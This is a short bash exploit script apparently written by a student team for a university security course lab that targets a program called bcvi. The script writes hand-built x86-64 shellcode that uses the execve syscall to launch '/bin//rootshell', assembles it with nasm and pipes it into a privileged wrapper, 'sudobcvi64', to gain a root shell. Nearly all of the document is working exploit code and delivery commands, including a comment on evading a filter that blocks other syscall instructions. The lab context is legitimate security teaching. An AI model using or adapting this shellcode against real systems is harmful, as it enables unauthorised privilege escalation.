csci5271/bcvi/exploit.1.1.sh

#!/bin/bash
# Exploit handcrafted by Team Shell Smash.
# zhan4854, beach144, jerus005
#
# Course-lab script: writes a hand-written x86-64 assembly payload (bits 64,
# 64-bit registers, `syscall`) to shellcode.s, assembles it with nasm into a
# flat binary named `shellcode`, and pipes a fixed stdin string into the target
# command with that file as its argument.  Both files are created in the
# current working directory and are not removed afterwards.  No exit status is
# checked anywhere, so each step runs regardless of whether the previous one
# succeeded.
#
# Shellcode
# The heredoc delimiter below is unquoted, so the shell would expand `$...`,
# backticks and backslash sequences inside the body; the body as written
# contains none of these, so shellcode.s receives it verbatim.  Everything
# from the line after `cat` up to EOF is the nasm source file's content
# (including its `#` lines), not shell comments.
cat > shellcode.s << EOF
bits 64
# Pad with four zeros
db 0x00, 0x00, 0x00, 0x00
push rbp
# Pushing 0x00000000, which is the second argument of argv[]
xor rax, rax
push rax
# The string "/bin//rootshell", literally
mov rdi, 0x006c6c656873746f
push rdi
mov rdi, 0x6f722f2f6e69622f
push rdi
# 1st argument (filename)
mov rdi, rsp
# 3rd argument (envp), should be 0x00000000
push rax
mov rdx, rsp
# 2nd argument (argv), is a pointer to 1st argument
push rbx
mov rsi, rsp
# 0x3b, or 59 is the syscall number for execve
mov al, 0x3b
# Blocking int 0x80 and sysenter but not syscall? lol
syscall
ret
EOF
# Compile to bin
# `-f bin` emits a raw flat binary (no ELF/object headers) into ./shellcode.
nasm -f bin -o shellcode shellcode.s
# Execute
# `echo` appends a newline, so the target's stdin receives "llllR\n".  The
# command `sudobcvi64` is not defined on this page and is resolved through
# PATH; presumably a wrapper around the course's bcvi target binary -- confirm.
echo "llllR" | sudobcvi64 shellcode